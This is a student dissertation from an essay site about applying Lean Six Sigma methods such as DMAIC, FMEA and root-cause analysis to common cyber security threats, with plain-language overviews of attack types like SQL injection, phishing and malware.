Disclaimer: This dissertation has been written by a student and is not an example of our professional work, which you can see examples of here.

Any opinions, findings, conclusions, or recommendations expressed in this dissertation are those of the authors and do not necessarily reflect the views of UKDiss.com.

Utilization of the Lean Six Sigma Methodology to Cyber Security Threats

Info: 11268 words (45 pages) Dissertation
Published: 10th Dec 2019

Reference this

Tagged: Cyber Security

Contents

Abstract

Acknowledgements

1. Introduction

1.1 Motivation

2. Literature Review

2.1 Lean manufacturing

2.1.1 Background

2.1.2 Lean Manufacturing Methodology

2.1.3 Plan, Do, Check, Act (PDCA)

2.1.4 Lean Thinking

2.2 Six Sigma

2.2.1 Background

2.2.2 Six Sigma Methodology

2.3 Lean Six Sigma

2.3.1 Background

2.3.2  Lean Six Sigma Methodology

3. Related work

3.1 ISO27k Standards

3.2 Lean Security Operations

3.3 Lean Security: How Better Development Can Protect Your Business

3.4 A Lean Approach to Information Security

3.5 Getting Lean on Security Operations

3.6 Simple Examples

3.6.1 Example 1

3.6.2 Example 2

3.6.3 Example 3

3.6.4 Example 4

4. DMAIC

4.1 Define

4.1.1 Definition of Security Threats

4.1.2 Applicable Tools

4.1.3 Project Charter

4.2 Measure

4.2.1 Measuring with Ponemon Institutes’ Data

4.3 Analyse

4.4 Improve

4.5 Control

5. Conclusions

6. References

Abstract

The purpose of this thesis is to investigate the usage of the Lean Six Sigma methodology in applying its tools and techniques to the various cyber security threats. The cyber threats investigated in this study are:

  • Web-based attacks
  • Denial of services
  • Phishing & Social Engineering
  • Malicious code
  • Malicious insiders
  • Malware
  • Viruses, worms, Trojans
  • Stolen devices
  • Botnets

Information on these attacks was acquired the Ponemon Institutes annual studies on the cost of cyber crime, the applicable information gathered from these studies was

  • The average cost of cybercrime to companies per Country
  • Used to calculate the total annual cost of cyber crime for all countries
  • The cost percentage for individual attacks per country rate of different attacks
    Used to calculate the total percentage of attack
  • The types of attacks faced by companies over five years
    Used to calculate the 5 year average occurrences

These calculations were used to implement lean six sigma tools such as the following:

control chart – To helppredict future cyber attacks and detect attack trend

XY matrix – Todetermine what tools are most and least effective tackling the cyber security threats

FMEA –  To prioritize and compare possible failures in the system that lead to an attack

A great number of other non statistical tools and techniques were also implemented on the cyber attacks such as root cause analysis of the cyber attacks using fishbone diagrams and 5 why analysis or 5s and Poka yoke these are simple tools that can used for eliminating and  preventing errors and organisation. Overall this study showed a good amount of implementations of the lean six sigma methodology on the cyber security attacks.

1. Introduction

In today’s world, the internet has become an integral part of everyday life for the majority of companies, governments and even just regular members of the public. With advances in hardware and software technologies the internet now has extraordinary abilities, for example, from your fingertips it allows access to vast amounts information while also staying connected to people all over the world.
Many companies have become dependent on the internet for the services it provides, services such as global real-time communications and interconnectivity, IoT devices, online purchasing and sales, fast large scale data processing, data transfer and data storage. While the internet has a vast amount of benefits for companies, it also opens  them up to the world of cybercrime. The cost of cybercrime for companies in 2015 was estimated to be over $500 billion dollars by 2019 that figure is predicted to quadruple to $2.1 trillion dollars [1]If a company is successfully attacked by a cyber criminal, not only are they affected by financial

loss, but they may be also affected by losses of customer confidence, investor confidence, credibility and resources

The Ponemon institute (sponsored by HP Enterprise Security), annually carry out a global study that reports on the cost of cyber crime within companies in various industrial sectors. Their goal is to quantify the economic impact of cyber attacks and observe cost trends over time, to be used by companies to better understand the  cost of cyber crime and invest in cyber security defences accordingly.

In their most recent global study published in October 2016, The global study involved 237 large companies(minimum 1000 employees) within six countries(United States, United Kingdom, Germany, Australia, Japan and Brazil), it found that companies on average annually spend $9.5 million dollars tackling cybercrime, ranging from a low of $.27 million to a high of $74 million, this figure rises to an average of $17.36 million for US companies, the cyber attacks that were most costly for the companies can be seen in descending order in below.

Attack Percent of Total Spent
Web-based attacks 17%
Denial of services 16.3%
Phishing & Social Engineering 12.4%
Malicious code

(classified as malware attacks that successfully infiltrated the organisations’ networks or enterprise systems)

12.3%
Malicious insiders 11.9%
Malware 10%
Viruses, worms, Trojans 8.7%
Stolen devices 7.9%
Botnets 3.5%

[2]

Companies these days are spending exponential amounts of money on latest defence systems to defend themselves from cyber threats, although even with the latest security defences most companies  still continue to make headlines for falling victim to some sort of cyber crime,  so much so that companies have now begun to expect that they will become victims to a cyber attack at some point, thus, they prepare for the day they get attacked instead of relying solely on defence systems to keep them protected indefinitely.

Most attacks performed by cyber criminals have minor consequences to a company, although some attacks result in detrimental consequences for the victim company, for example, a major consequence from an intrusion by a cyber criminal onto the company database may result in the release of customers’ credit card information  and/or other personal information. One of the most common reasons for companies falling victim to an intrusion, is the software they use has major security vulnerabilities. The software may have a point of entry for cyber criminals to exploit right from the time when it was developed, this is because security is rarely a priority for developers who rather ship a product fast than spend time testing the product for potential risks. Cyber criminals are in many cases programming geniuses, who may spend endless hours data scraping or searching programs for undiscovered security holes and/or programming errors to gain access to a system. The vulnerabilities can usually be fixed with patches and updates, but sometimes not before the damage has already been done. Another one of the most common reasons for companies falling victim to a cyber attack is due to human risk, employees may unknowingly grant hackers access onto the company system, mainly due to the following reasons:

  • Getting tricked into disclosing their passwords or choosing weak passwords,
  • Opening phishing emails
  • Clicking malicious links
  • Losing/stolen company devices

Hackers are increasingly targeting these human frailties because security defences have improved far faster than people do and unfortunately people can’t be updated or patched

1.1 Motivation

Having previously studied the Lean Six Sigma methodology for a number of years and achieving a honours degree in Industrial engineering, I could see many uses for the lean six sigma methodology in cyber the security sector. This influenced my decision to undertake a project of this type

2. Literature Review

2.1 Lean manufacturing

2.1.1 Background

The majority of lean manufacturing methodologies were developed in Japan, following World War II, the US sent consultants to provide aid and advice to the Japanese in a bid to help rebuild their manufacturing industry. Toyota reviewed their manufacturing techniques, it occurred to them that a series of simple innovations within their process flow would provide better efficiency and continuity, this in turn led to creation of  the  Toyota Production System (TPS). The TPS is a system that strives to continually improve their standard processes and procedures in order to ensure maximum quality, improved efficiency and eliminate waste. [3]

Through implementation of the TPS it is estimated that the average profit for Toyota is 70% higher than industry average in sales. These days many companies attempt to implement the TPs within their organisations although few reach the same level of success as Toyota.[4]

The term lean was first used nearly 30 years ago in an article titled ‘ Triumph of the Lean Production System’ by John Krafcik whilst working in the MIT International Motor Vehicle Program. In this article he wrote about the origin of Lean and describes Lean production as being “lean” because it uses less of everything compared with ‘mass’., it uses half the human effort in the factory, half the manufacturing space, half the investment in tools, half the engineering hours to develop a new product in half the time. Also it requires keeping far less than half the inventory on site, which results in fewer defects and produces a greater and ever growing variety of products. [5]

2.1.2 Lean Manufacturing Methodology

The basic idea of Lean manufacturing is to reduce waste and make continuous improvements within all operations & processes of the workflow, all whilst still meeting  customer expectations.

In lean manufacturing, waste is seen as any task that does not add value to the product for the customer.  Toyota  identified  7 different  types of wastes:

  1. Transport
    Transport within the business is the physical movement of materials to different locations. This movement is an activity that is non value adding to the customers product.
    Transport is usually a high cost within a company, this is due to the need for people and/or equipment to carry out the transportation. Streamlining the movement is usually implemented instead, for example, using a conveyer belt type device for transportation in-between processes.
  2. Inventory
    Inventory within a company is any piece of product tied up as either raw materials, work in progress or finished goods. All of these inventories cost the company money up until the item is sold and has physically left the building.
  1. Motion

Wasted motion are any unnecessary movements done by either an operator or machine, which are not carried out as easily or efficiently as can be achieved, such as excessive travel between stations or excessive machine movements. These wasteful motions cost the company time & money and cause stress on the employees and machines.

  1. Waiting

Waiting is a very common waste seen in most companies, whether it’s an operator  waiting for an operation to finish, a supplier or the repair of a machine. These waiting wastes disrupts work flow and be very costly to the company.

  1. Overproduction

Many companies adopt a strategy of ‘Just in case’ production, where inventory (finished goods, raw material or work in progress) is kept on hand in to be sure the product will be in stock if needed. This strategy is normally used in case the product sells out and may have long set-up times and/or long lead times. This waste hides underlying problems in the work flow and be very costly to the company.

  1.  Over-processing
    The over-processing waste is any processes carried out on the product that are unnecessary and do not add value to the product for the customer. Each process should be accessed to determine whether or not it increases the value of the product, improve the functionality or if it makes it more appealing to the consumer, over-processing can be seen in processes, such as: over polishing parts, sorting parts that don’t need to be sorted, heating parts at too long or too high of temperature, excessive washing, redundant paperwork, excessive data collection, tumbling, turning, drying parts longer than necessary, and applying excess paint. Also with the  use of  inappropriate techniques, oversize equipment, working to tolerances that are too tight, perform processes that are not required by the customer and so forth. All of these things cost us time and money. One of the biggest examples of over-processing in most companies is that of the “mega machine” that can do an operation faster than any other, but every process flow has to be routed through it causing scheduling complications, delays and so forth
  2. Defects
    Defects are the most obvious of the seven wastes, a defect is when the product specification does not meet the customers’ requirements. The main reasons for defects occurring can be: mistakes made during original design, processes and procedures carried out on the product incorrectly,  assembled incorrectly , machine cause, training,  A defective product usually requires either rework or replacement, it wastes resources and materials, it creates paperwork and can lead to lost customers.

Elimination of the seven wastes is accomplished through the implementation of a  combination of lean tools, techniques, methods and principals.[6]

2.1.3 Plan, Do, Check, Act (PDCA)

The PDCA cycle is an essential part of lean manufacturing, it is an iterative methodology that  applies a scientific approach to implementing continues improvements. The steps in a PDCA cycle can be seen below.

  • Plan
    To generate a plan or hypothesis and while also determining the expected results
  • Do
    To implement plan or run an experiment
  • Check
    To evaluate the results and see if they achieved what was expected
  • Act
    To review, assess and refine, carry out again if required[7]

2.1.4 Lean Thinking

Lean thinking is applying lean principals not just in the manufacturing process but instead to the entire company. It has been proved to result in major benefits to companies, with many companies reporting benefits such as: efficiently being able to produce products at the same product level but with half  the workforce, reduced cycle times and higher quality products.  [8]
According to the Lean Enterprise Institute ( founded by Womack and Jones in 1997) there are five key principles in lean thinking, these are as follows:

  1. Value (in the eye of the customer)
    The focus when producing  products, processes or methods, is to design them  in a way that they will fulfil the customers’ needs
  2. Value Streams
    When the value has been determined, all processes should be mapped with value streams. The stream should identify all the actions in the entire flow of the process from start to finish to identify the steps that do not add value.
  3. Flow
    After the wastes has been determined, they should be eliminated. Ideally a one piece flow is desired although is often not feasible, instead every step the piece moves it should add value that meet the customers’ needs.
  4. Pull system
    Once an efficient flow system has been created, a pull production system for the product is designed.  Ideally one using the Just-in-Time(JIT) modal where the customer places the order,  and the product is manufactured only when the order has been placed
  5. Perfection
    Continue the pursuit of perfection until all process add 100% value and have zero waste.
    They may take some time, but withcontinuous incremental improvements may eventually get to perfection.   [9]

In Lean Manufacturing the main focus is waste reduction, with Six Sigma the focus on waste reduction but whilst also focusing on process improvement and variation reduction

2.2 Six Sigma

2.2.1 Background

Many of the  Six Sigma methodologies can be traced as far back as to Carl Friedrich Gauss (1777-1855) who introduced the concept of the normal curve. Next in 1920’s Walter Shewhart used Six Sigma to measure product variation. Although Six Sigma didn’t really come into existence until the mid-1980s when Motorola decided that the conventional  measurement of defects in thousands of opportunities didn’t provide enough granularity, they instead wanted to measure the defects per million opportunities measurement.[10]

This journey started when Motorola engineer Bill Smith quietly began developing a methodology to standardize defect measurement and drive improvements in manufacturing. In the quest to implement this new methodology it lead to the creation of  tools to measure and compare the quality improvement rate.
In the pursuit of achieving that a product or process has just 3.4 defects per million units or opportunities, the methodology continued to improve with the use of statistical tools, a step-by-step process to drive improvement, innovation and optimization.
Six Sigma soon became a collaborative effort between customers, suppliers and stakeholders with other companies noticing the benefits and developing their own approach to follow suit, which lead to the use of the Six Sigma methodology all over the world.[11]

2.2.2 Six Sigma Methodology

Six Sigma is ultimately a measure of quality that strives to achieve near perfection using a data-driven approach and methodology for eliminating defects (where a defect is defined as anything outside of customer specifications) in a process.[12]
The six sigma level of performance is for a process to produce no more than 3.4 defects per million opportunities (an opportunity is the total quantity of chances for a defect), this expressed as a percentage would mean this process must be free of defects 99.99966% of the time.  To achieve this high level of quality and efficiency the process uses a combination of tools and statistics. [13]
When discussing the use of Six Sigma, the DMAIC methodology is usually the strategy used for the Six Sigma implementation.
DMAIC is a data-driven project based strategy that focuses on process improvement and variation reduction.  [12]
This strategy is not exclusive to Six Sigma and can be implemented as a standalone tool, although it is usually employed as part of the Six Sigma Quality Initiative.  The word DMAIC is actually is an acronym for five interconnected phases: Define, Measure, Analyze, Improve, Control.[14]
Each phase of the DMAIC strategy is required for the best results to be achieved. Further details of the phases in the strategy can be seen below.

  • Define
    The goal of this phase is to define the details of the project, such as:

    • Who the customers are and what their expectations and requirements for this project entail.
    • The details of the project, such as what the boundaries are, the timelines and how the project work will flow.
    • What the purpose of performing this project is, what hopes to be achieved by doing it and what the overall project goals are.
  • Measure
    The goal of this phase is to measure the current process performance, this is carried out by:

    • Developing a data collection/measurement plan
    • Collecting data from all the inputs and outputs
    • Ensuring the measurement system is accurate
  • Analyze
    The goal of this phase is to analyse the measured data to determine the root causes and relationship with the effects, this is carried out by using tools to:

    • Identify the gap between current and the goal performance
    • Prioritize the potential opportunities to improve
    • Identifying the sources of the causes
  • Improve
    The goal of this phase is to improve the current performance by developing techniques and solutions to eliminate and prevent the root causes, this is carried out by using tools to:

    • Develop innovative ideas
    • Focus on the easiest and most critical solutions
    • developing and implement a detailed implementation plan
  • Control
    The goal of this phase is control the improvements, so that they do not revert back to the way they were, this is this is carried out by implementing tools and techniques to:

    •  Ensure permanent reliable monitoring plan is kept on going into the future, so that any deviations will be corrected immediately
    • Strategies are set in place to prevent the causes from reoccurring
    • Establish and well define the improvements through modification of systems and structures, such as training and reward incentives.

The DMAIC strategy can in way be seen as an application of a PDCA cycle, the difference is that DMAIC is more of a project based approach, whereas PDCA has a wider application. Often both approaches are used concurrently on the same project, DMAIC analyses the root causes, while PDCA focuses on implementations within project which also help discover causes.[15] [16]

2.3 Lean Six Sigma

2.3.1 Background
The use of lean six sigma came about in the 1980’s, lean manufacturing and six sigma consultants were getting trained in both mythologies and quickly realised the synergy between both, if they were to use a combination of tools from both lean and six sigma, it resulted in a greater number of problem-solving techniques, which ultimately led to greater savings with highly efficient processes for the companies.[17]

2.3.2  Lean Six Sigma Methodology

Lean Six Sigma is a combination of lean manufacturing and six sigma. It has been proven that they both complement each other in a way that lean accelerates six sigma, to produce greater results that wouldn’t usually be seen through implementing them individually. Some of the results from the combination of both mythologies can be seen below:

  • Profit is increased for the company through the use streamlining processes, which results in products or services being completed faster with greater efficiency.
  • Costs are reduced, through eliminating wastes from processes  and having greater abilities to solve problems.
  • Efficiency & Effectiveness is Improved, allowing for a greater number of products or services being produced.
  • It helps develop the effectiveness of employees, through involving employees in the improvement process it builds trust, and gives the employees a sense of ownership and accountability.[18]

3. Related work

There is not an extensive amount research carried out on lean six sigma being implemented within the security area, and next to no research carried out on lean six sigma being applied directly to the real world cyber security threats being faced by companies today. The methodology is however frequently used for other sectors besides from just the manufacturing sector, with many of the tools and techniques increasingly being successfully used in business processes, and are even used in software development.

Some examples of documented usage for the lean six sigma tools and techniques  being used  in the cyber security sector can be seen below:

3.1 ISO27k Standards

The “ISO27k” suite comprises of about forty standards related to IT security techniques for  information security management, for example, a standard may contain a set of guidelines for best security practices in a certain area of IT security. The suite of standards have security techniques that are applicable to wide range of areas in IT security, such as: the
ISO/IEC 27001 standard is used for Information security management systems — Requirements,
to other standards such as the
ISO 27799 standard is used for Health informatics — Information security management in health using ISO/IEC 27002.
The standard that is most related to this study is the:
ISO/IEC 27001 Information security management systems — Requirements or ISO27001 as it’s usually referred to as ISO 27001 , this is a International Standard that came into in October 15, 2005, with the second edition coming into effect on October 01, 2013.[19]

It is a standard that provides a general framework to help protect company information such as financial data, intellectual property or sensitive customer information. It can help identify security risks whilst also putting security measures in place. It is designed in a way to  ensure continues reviewing and refining of the security risks and measures. [20]

It is used by most companies as formally specification when creating their information security management system (ISMS ) for use within their company.
The ISMS is a set of policies and procedures used to manage the security risks and requirements within a company.  Companies are not legally obliged  to implement ISO 27001, it instead provides suggestions for documentation, internal audits, continual improvement, corrective and preventive actions. A company may comply with and then become certified with ISO27001, for which thousands of companies have done so and in turn have been certified compliant with ISO27001 [21]

The ISO/IEC standards recommend following the continues improvement model of Plan-Do-Check-Act(PDCA) to maintain the ISMS within your company. The ISO 27001 specifies a framework to follow to implement a PDCA cycle :

  • Plan: Design an ISMS workflow to assess threats and determine controls.
  • Do: Implement the plan.
  • Check: Review the implementation and evaluate its effectiveness.
  • Act: Make any needed changes to improve the effectiveness of your program.

The Six Sigma DMAIC approach is often used alongside the PDCA cycle, to meet other requirements[22]

3.2 Lean Security Operations

In a blog post written by Ray Bernard, he discusses  about the need for applying lean principles to security operations in what he calls ‘Lean Security Operations’.  He states it that it involves two approaches:

  • The first being that the Lean Manufacturing principles need to be applied to security operations.
  • The second being is to then use security technologies, such as security video cameras to support lean operations outside of security[23]

3.3 Lean Security: How Better Development Can Protect Your Business
In this article written by Andrew Storms, he discusses  how Lean Security can protect your business. He explains how the lean security approach to information security is similar to the Toyota principles of management and production that calls for environmentally aware engineering, simplified coding, automation of security checks and constant incorporation of feedback

He states “lean security doesn’t mean massive costs” it instead uses process improvements and cultural changes above purchasing new tools, but to be successful it calls for engineers to keep the principles in mind throughout the development process.
He claims that when lean security is implemented correctly it results in having a self-defending, simple system whose creators are people who are aware of the real-world security risks and havethe company’s business goals in mind.

In the article Andrew gives some guidelines on how to implement lean security, these guidelines can be seen below:

  • Improve Environmental Awareness
    The lean security approach to risk management should be done as a team effort. Everyone should keep the issues of data privacy, software security and the business needs in mind throughout product development.
    When team members start to understand a product’s security risks, they then start creating a more secure environment.
     
  • Simplify Engineering
    To reduce complexity not only with the coding, but also by reorganising the entire system in a way that improves the time to market and tightens feedback loops.
    Mainly implement simple engineering while keeping the teams compact and agile, as complex teams results in more lines of code that are constantly being reinventing, thus the less secure it becomes.
     
  • Automate or Die
    Automation is an essential part of lean security, no team of engineers can discover and remedy them all, the ever increasing risk of cyber threats manually, thus, automation can be used for  vigilance without the need for continued manpower
     
  • Measure Everything
    Measurement should begin when identifying the goals you want to achieve.
    Measurements and metrics should be regularly reviewed and re-measure in pursuit of continues improvement.[24]

 3.4 A Lean Approach to Information Security

This paper written by Fred Scholl, PhD, CISSP, CISM, CHP (a security risk management consultantbased in Nashville, Tennessee.), he looks at how and where to apply lean concepts for security managers. The lean principals adapted to information security are as follows:

Voice of the Customer
This is the number one principle of lean thinking, as security takes place all across the IT department there are multiple customers of sort, all of whom have se­curity needs that  must be met. These customers include users, executive managers, and the customers of the business itself. It must be clear before any security procedures are implemented how it will con­tribute to satisfying the needs of these customers.

Continuous Improvement
Continuous improvement applies to the individual security processes, such as access management and it also applies  to the entire security program.

Proactive Behaviour
By taking proactive action when small-scale security events are detected, it helps prevent major incidents and outages,

Systems Thinking
With lean systems the focus is build the best system possible, without relying on sophisticated architectures, the system should be built through constant monitoring and improvements.

Constancy of Purpose
The security policy must be enforced with minimal excep­tions in order to support the security program.

Respect for People
This principle implies that each employee and contractor has the ability to successfully do and improve upon his or her job for which they are held accountable for doing.

Quality at the Source
Doing it right the first time applies to all security processes

Flow, Pull, and Just in Time
This principle is applied to security processes such as access management and change man­agement, where multiple steps can often result in delays or inaccuracies.

Culture.
Any true security program must effect a cultural change within the organization to be fully effective[24]

 

 

3.5 Getting Lean on Security Operations
In this article written by  Derrick Wright CPP (security manager for Baxter Healthcare, Cherry Hill, N.J), he explains what the first step to start the lean process in a business is. It starts with  performing a stakeholders exercise, which leads to answering two question, firstly you need to answer the question of “Who depends on Security performing its functions?” this leads to thinking about who the stakeholders are and what they value. Once the  stakeholders have been established, you need to find out:
 

  • What security functions is the stakeholder dependent on and why?
  • What are their expectations of Security?
  •  How do they rate Security’s perfor­mance?

The next  question you need to answer is: “Who has a role in the performance of security functions?” The answer  will include security staff; management decision-makers senior to security; non-security personnel (employees, contractors and visitors); heads of business units, divisions and departments. [25]

3.6 Simple Examples

Four simple examples of lean six sigma in use for security operations, can be seen below.

3.6.1 Example 1
In a New Jersey manufacturing plant they launched a Lean initiative, where the security manager introduced Lean principles to security operations by utilising manual process improvementand software to implement a self-service for items like parking permit, applications, area work permits, and changes to access privileges, these changes improved departmental productivity and reduced the time for employee transactions.[23]

3.6.2 Example 2
An Executive Vice President in California was able toeliminate a quarter mile walk  to a loading dock, through the use of cameras to verify critical shipments were ready to be shipped.[23]

3.6.3 Example 3
A health care provider utilised lean in their IT department to improve mul­tiple processes, such as: a security function was used to facilitate improvements in the patch management process and better document the business benefits of improved processes. [24]

3.6.4 Example 4
A the office furniture business utilised lean to implement an effective email spam filtering system, this resulted in significant cost sav­ings and end user satisfaction [24]

4. DMAIC

This project if going to follow the data-driven project based strategy of DMAIC for its implementation of the utilization of the Lean Six Sigma methodology applied to various cyber security threats.

4.1 Define

When implementing the define phase we need to define what will be used in this DMAIC project. The problem being tackled need to be clearly identify, whilst also stating why there is a need for a project of this type

4.1.1 Definition of Security Threats

Below has a brief description of some of the most common cyber threats companies face.

Web-based attacks
A Web based attack is an attack that takes place within a web application, it is usually caused through improper coding by the developer due to a lack of tools or knowledge on  how to build secure applications. The improper coding usually leads to weaknesses and  vulnerabilities within the application, that an attacker attempts to exploit.
The attacker usually targets vulnerabilities that will  gain access to the companies’ back-end database, once successful the attacker has access to the valuable company and customer sensitive information stored (often unencrypted) within.

The most commonly used web-based attacks can be seen below :

  • SQL injection
    In this type of attack, an attacker creates a malicious Structured Query Language (SQL) query, the attacker then inputs this query into, for example, a login form or search box on the company’s website that’s used to submit customer data to the back-end database. If the website has a SQL injection vulnerability, the attackers SQL query can force the database to successfully execute the query and mistakenly allow the attacker access to sensitive data within, such as usernames, passwords, credit card details, social security numbers, dates of birth, and maiden names which can be used for malicious reasons.
  • Cross-Site Scripting (XSS)
    XSS is another code injection type of attack, this type of attack is usually used to perform cookie stealing, malware spreading, session hijacking, and malicious redirection. In this attack an attacker creates a malicious script (usually using JavaScript), if an XSS vulnerability is present on the company’s trusted website, the attacker injects this script within a webpage a typical user would load. This webpage becomes a launching point for the attackers malicious script, which is then executed on the users browser when the webpage is loaded, it then redirects the user to a replicated website of the company that is under control by the attacker, for example, if the attacker injected a redirect script into the code for a login button on the company site, when a user clicks the login button they’d expect to be directed to the companies’ login screen but would instead be redirected to the attackers replicated login screen.[26]

Denial of service (DoS)

With a DoS attack, an attacker(s) main goal is to either deny genuine users from accessing the  company’s web resources or to completely overwhelm the company’s server causing it to crash. This is carried out by the attacker(s) flooding the network with an abundance of worthless web traffic. The DoS attack can be carried out from one computer using a single Internet connection or with multiple computers in a botnet while using multiple Internet connections as a Distributed denial of services (Ddos) attack.[27]

Social Engineering attacks

These types of attacks target human psychological vulnerabilities. The typical social engineering attack is usually non-technical, and instead uses tactics such as deception and manipulation to trick it’s victims into inadvertently disclosing company’s sensitive  information. This makes these types of attacks quite appealing to cyber criminals, as it’s usually easier and faster to trick a victim into granting access to sensitive data, than it is to hack into it.
Phishing is the by far most common type of Social Engineering attack used. An attacker usually crafts a fraudulent  email, instant message or text message that’s disguised  to come from a legitimate trusted source. Once this message is opened by the victim it may for example, urgently request sensitive information, or may contain a clickable link that will direct to spoofed malicious website or instead install malware on their system. Spear phishing is often seen in companies, the fraudulent a message is crafted specifically for a certain person or company.[28]

Malicious insiders
As with social engineering, malicious insiders is a human vulnerability threat. A malicious insider is somebody with some sort of professional link to the company, and are determined to bring harm to it. The malicious insider has in some way the ability to access and acquire certain sensitive information (such as competitive or intelligence information) within the company, and then may have the ability to erase evidence of their activities. The stolen information is then usually used for malice reasons or for their own personal financial gain. Malicious insiders can range from current employees, past employees, contractors or even vendors. [29]

Stolen devices

The final human cyber security threat is stolen devices. With the immense rise of smart mobile devices over recent years, many companies now provide their employees with company devices, such as  smart phones and tablets. A comprehensive BYOD strategy to ensure this approach is implemented securely in order to prevent these security threats at any time, while this may have numerous advantages it also introduces  many new security threats, many companies have yet to employ a comprehensive BYOD strategy to ensure this approach is implemented securely in order to prevent these security threats. Whilst employees use their devices within the company they’re protected by the companies’ security procedures, but when an employee works outside of the workplace, their device is at a higher risk of theft.
It seems that as the size of mobile devices has decreased, the likelihood of them being lost or stolen has increased, this in turn leaves  companies’ vulnerable to cyber attacks and their sensitive data more accessible. For this reason many cyber criminals will organise thefts of company devices to gain access to the company sensitive data, as it’s usually far easier to steal somebody’s device than it is to hack into their company.[30]

Malware

The word malware is a combination of two words malicious and software, it is a very broad term that refers to a range of different types of malicious software, generally all types of malware have been specifically developed to carry out an unwelcomed invasion on a victims’ device, usually the reasons for the invasion are of malicious intent. If a device has been infected with malware, it executes the attackers malicious code on the device.
Different types of malware are often used in conjunction  with each other, for highly effective and efficient attacks.
Some of the common malware attacks can be seen below.

  • Viruses
    Computer viruses are one of the most common types of malware. A virus is a  malicious program, they are designed by cyber criminals to perform their malicious code once executed on a victims device. A virus usually spreads from device to device, through being attached to certain legitimate files, where it can then sit relatively inconspicuously on a victims device up until the moment of execution, after which it multiplies rapidly though constant replication of itself.
  • Worms
    A computer worm is a malicious program designed to penetrate its victims device via their network connection. Worms are similar to viruses in that they multiply through replication of itself,  although differ in the fact that they can spread from device to device through the ability of  sending replicated copies of itself over the network that seek out other unsuspecting victims on the same network, once a victim is found, the worm usually runs in the background of their device without even needing to be initial executed.
    Worms can modify and delete files, and even inject additional malware onto the computer.
  •  Trojans
    A Trojan is a type of malware usually designed to hide their true intent, this is done through  disguising the Trojan as a harmless download or hiding it in an email attachment. Different to viruses or worms, a Trojan does not have the ability to replicate, instead, when a Trojan has been activated on a victim’s device, it usually created a backdoor on the device, giving the attacker access and control of the device.

    Many of these malware attacks are often used to also download or inject other malware on to victims’ devices. Some of the other malware types that are injected  on to the infected device can be seen below.

  • Ransomware – This locks you out of the device until a fee has been paid to unlock it
  • Spyware – This software secretary runs on the device, it monitors  and records information, such as browsing details and other personal information, which is then sent to a third party.
  • Scareware – Scares you into believing they’re problems with the device, then tricks you into purchasing bogus software to repair the non-existent problems
  • Adware – This software is usually unwanted, but not malicious. It’s software that displays advertisements, although some adware also tracks browsing information, thus making it a type of spyware
  • Botnet

A botnet is an accumulation of remotely controlled internet-connected devices, that are being controlled by a cyber criminal. The attacker has seized control of their unknowing victims device, through infecting it with other malware (often a Trojan), that then permits access and control of the device. Once under control of multiple devices, the attacker can send commands simultaneously to all the devices in the botnet, which gives the attacker the ability to perform an abundance of different malicious acts, such as performing a distributed denial-of-service (DDOS) attack.[31]

4.1.2 Applicable Tools

Below is a definition of all the applicable lean six sigma tools used in the DMAIC

Project Charter

The project charter is usually the first step of a DMAIC project, therefore it takes place in the define phase of the project. It is used to give direction and a sense of purpose to the project. It is usually designed to be  clear and precise, whilst also still keeping it short and brief, this is done through defining the scope of the project by:

  • Outlining objectives and deliverables
  • Setting targets, goals and what the timeline is to complete them
  • Justifying the need for the project
  • Specifying the boundaries,
  • Identifying the constraints

[32]

Bar chart

The bar chart is a common tool used in Lean Six Sigma, as a way to better understand what’s going on with the current data. It visually summarises and displays the differences and shows comparisons between groups of measured data, with the data then being presented in that way, it usually increases the chances of detecting trends, variables and other flaws that exist within the data.[33]

Run chart

The run chart (also known as a time series chart) is a powerful but simple tool often used to display the  output or performance of a certain process in order to determine any patterns, trends or behaviours within the process, over a specified period of time. It can indicate if the process is changing over time, through revelling any inconsistencies or variations within the process.[34]

5 why analysis

The 5 why analysis is a simple tool normally used in the analyze phase as a way of figuring out the root cause of a failure or problem occurring. By asking why 5 times (It takes on average 5 times of asking why to find the root cause) it digs down deeper, past the effects of the problem to the actually root cause. Not only does it figure out why the problem occurred but analysing each cause also determines how the problem occurred.
The 5 why analysis is carried out simply by asking how the problem occurred, if the answer is not the root cause then ask again why that cause occurred, keep asking until the root cause is agreed upon.
Without identifying the actual root cause, the problem is only being treating without actually being eliminated, this will usually result in the problem ultimately  reoccurring.
The 5 whys analysis can be used individually or along with a fishbone diagram, once the primary and secondary causes have been established on the fishbone, the 5 whys analysis can be used to further drill down to the root causes.[35]

Fishbone Diagram

The fishbone diagram (also known as a Cause-and-Effect Diagram ) is a tool that graphical displays possible root causes of a problem or effect. The tool is applicable to effects that are either positive with a desired outcome or negative with an undesired outcome.
The fishbone is constructed in a way that looks similar to the side view of a fish, where the  problem or effect is first placed the where the skeletal head would be, from this connects the spine which connects to what would be large bones, at the tips of these bones is 4 to 6 identified broad causes for the effect. On these large bones are smaller bones, this is where the root causes are placed, often decided upon though the use of other tools such as brainstorming.[36]

Brainstorming

Brainstorming is a group exercise used for generating a large amount of ideas or solutions to a problem or issue in a relatively short period of time. Brainstorming can be used in any phase in the DMAIC process, but is usually found to be most beneficial when used with other tools, such as a failure mode and effects analysis(FMEA).
Before commencing a brainstorming session certain ground rules are set by the facilitator, that are designed to ensure all participants feel free to express their opinions and ideas without feeling they’ll be  ridiculed or face criticism from their colleagues.  Participants are encouraged to build upon other ideas, with the preferred view ofquantity over quality of ideas.
When starting the brainstorming session, to get people in the right mindset and get words flowing a word game such as the word association game is played, once people have warmed-up a lead question related to the problem is introduced.
Whilst a brainstorming session is in full swing it’s highly energised and moves rapidly, other tools such as affinity diagrams are often used here to help organise ideas, so that the group can plan ahead whilst new ideas are still being collected, the ideas are usually prioritized at a later stage.  [37]

Affinity diagram

An affinity diagram (also known as a KJ Analysis) is a type of analytical tool that organizes a large amount of data (ideas, issues, solutions, problems), these are then sorted by the group facilitator and participants sorted into subgroups that share a common theme or relationship. This tool is often used during a brainstorming session, through having a participant write their ideas on a post-it note, these post-its are then given to the facilitator and stuck onto a wall in their  respective groups. The affinity diagram can also be used after  a brainstorming session has taken place, as a way of sorting out the overwhelming chaotic output which ensued during the brainstorming session. [38]

Failure Mode Effects Analysis (FMEA)

A FMEA is a tool often implemented in the Analyze phase, it is considered by many to be perfect Six Sigma tool. It is used with brainstorming in a way that it predicts and anticipates what the most likely failures to occur in a process are, whilst also prioritising each  failure by its impact. It finally attempts to determine the most suitable preventive measures and/or corrective actions for these failures.
A FMEA begins by ranking each failure from a compiled list of failures, on a scale of 1 to 10 by its severity (not severe – extremely severe), risk of occurrence (rarely occurring – frequent occurrence) and detection rate (easily detectable – highly unlikely to detect).
